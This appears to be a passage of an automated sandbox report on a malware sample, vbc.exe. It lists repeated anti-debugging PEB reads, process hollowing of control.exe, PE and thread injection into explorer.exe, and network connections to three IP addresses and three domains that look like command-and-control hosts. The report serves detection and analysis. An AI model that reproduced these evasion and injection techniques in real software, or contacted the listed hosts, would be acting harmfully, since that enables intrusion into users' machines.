        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C3D34 mov eax, dword ptr fs:[00000030h]6_2_015C3D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAD30 mov eax, dword ptr fs:[00000030h]6_2_015BAD30
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]6_2_0167FDE2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]6_2_0167FDE2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]6_2_0167FDE2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167FDE2 mov eax, dword ptr fs:[00000030h]6_2_0167FDE2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01668DF1 mov eax, dword ptr fs:[00000030h]6_2_01668DF1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]6_2_01636DC9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]6_2_01636DC9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]6_2_01636DC9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov ecx, dword ptr fs:[00000030h]6_2_01636DC9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]6_2_01636DC9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636DC9 mov eax, dword ptr fs:[00000030h]6_2_01636DC9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h]6_2_015CD5E0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0 mov eax, dword ptr fs:[00000030h]6_2_015CD5E0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016805AC mov eax, dword ptr fs:[00000030h]6_2_016805AC
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016805AC mov eax, dword ptr fs:[00000030h]6_2_016805AC
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h]6_2_015EFD9B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFD9B mov eax, dword ptr fs:[00000030h]6_2_015EFD9B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]6_2_015B2D8A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]6_2_015B2D8A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]6_2_015B2D8A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]6_2_015B2D8A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B2D8A mov eax, dword ptr fs:[00000030h]6_2_015B2D8A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]6_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]6_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]6_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581 mov eax, dword ptr fs:[00000030h]6_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82 mov eax, dword ptr fs:[00000030h]6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]6_2_015E1DB5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]6_2_015E1DB5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E1DB5 mov eax, dword ptr fs:[00000030h]6_2_015E1DB5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E35A1 mov eax, dword ptr fs:[00000030h]6_2_015E35A1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA44B mov eax, dword ptr fs:[00000030h]6_2_015EA44B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EAC7B mov eax, dword ptr fs:[00000030h]6_2_015EAC7B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D746D mov eax, dword ptr fs:[00000030h]6_2_015D746D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h]6_2_0164C450
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164C450 mov eax, dword ptr fs:[00000030h]6_2_0164C450
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671C06 mov eax, dword ptr fs:[00000030h]6_2_01671C06
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]6_2_0168740D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]6_2_0168740D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168740D mov eax, dword ptr fs:[00000030h]6_2_0168740D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]6_2_01636C0A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]6_2_01636C0A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]6_2_01636C0A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636C0A mov eax, dword ptr fs:[00000030h]6_2_01636C0A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EBC2C mov eax, dword ptr fs:[00000030h]6_2_015EBC2C
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]6_2_01636CF0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]6_2_01636CF0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01636CF0 mov eax, dword ptr fs:[00000030h]6_2_01636CF0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016714FB mov eax, dword ptr fs:[00000030h]6_2_016714FB
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688CD6 mov eax, dword ptr fs:[00000030h]6_2_01688CD6
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C849B mov eax, dword ptr fs:[00000030h]6_2_015C849B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496 mov eax, dword ptr fs:[00000030h]6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688F6A mov eax, dword ptr fs:[00000030h]6_2_01688F6A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CEF40 mov eax, dword ptr fs:[00000030h]6_2_015CEF40
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CFF60 mov eax, dword ptr fs:[00000030h]6_2_015CFF60
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DF716 mov eax, dword ptr fs:[00000030h]6_2_015DF716
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h]6_2_015EA70E
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h]6_2_015EA70E
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h]6_2_015DB73D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h]6_2_015DB73D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168070D mov eax, dword ptr fs:[00000030h]6_2_0168070D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168070D mov eax, dword ptr fs:[00000030h]6_2_0168070D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EE730 mov eax, dword ptr fs:[00000030h]6_2_015EE730
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h]6_2_0164FF10
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h]6_2_0164FF10
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h]6_2_015B4F2E
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h]6_2_015B4F2E
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F37F5 mov eax, dword ptr fs:[00000030h]6_2_015F37F5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C8794 mov eax, dword ptr fs:[00000030h]6_2_015C8794
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]6_2_01637794
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]6_2_01637794
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637794 mov eax, dword ptr fs:[00000030h]6_2_01637794
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]6_2_015C7E41
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]6_2_015C7E41
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]6_2_015C7E41
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]6_2_015C7E41
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]6_2_015C7E41
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h]6_2_015C7E41
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h]6_2_0167AE44
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h]6_2_0167AE44
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]6_2_015DAE73
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]6_2_015DAE73
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]6_2_015DAE73
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]6_2_015DAE73
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h]6_2_015DAE73
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C766D mov eax, dword ptr fs:[00000030h]6_2_015C766D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h]6_2_015EA61C
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h]6_2_015EA61C
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FE3F mov eax, dword ptr fs:[00000030h]6_2_0166FE3F
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]6_2_015BC600
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]6_2_015BC600
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h]6_2_015BC600
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E8E00 mov eax, dword ptr fs:[00000030h]6_2_015E8E00
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671608 mov eax, dword ptr fs:[00000030h]6_2_01671608
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BE620 mov eax, dword ptr fs:[00000030h]6_2_015BE620
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E36CC mov eax, dword ptr fs:[00000030h]6_2_015E36CC
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F8EC7 mov eax, dword ptr fs:[00000030h]6_2_015F8EC7
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FEC0 mov eax, dword ptr fs:[00000030h]6_2_0166FEC0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688ED6 mov eax, dword ptr fs:[00000030h]6_2_01688ED6
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E16E0 mov ecx, dword ptr fs:[00000030h]6_2_015E16E0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C76E2 mov eax, dword ptr fs:[00000030h]6_2_015C76E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016346A7 mov eax, dword ptr fs:[00000030h]6_2_016346A7
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]6_2_01680EA5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]6_2_01680EA5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h]6_2_01680EA5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164FE87 mov eax, dword ptr fs:[00000030h]6_2_0164FE87
        Source: C:\Users\user\Desktop\vbc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_015F9910
        Source: C:\Users\user\Desktop\vbc.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 192.185.131.238 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 108.167.169.56 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 103.141.97.24 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.funwave.info
        Source: C:\Windows\explorer.exeDomain query: www.tadeumilhosrp.com
        Source: C:\Windows\explorer.exeDomain query: www.reprograme-se10x.com
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\vbc.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: AF0000Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\vbc.exeMemory written: C:\Users\user\Desktop\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\vbc.exeThread register set: target process: 3688Jump to behavior
        Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3688Jump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exeJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exeJump to behavior
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.534282769.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.410398740.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
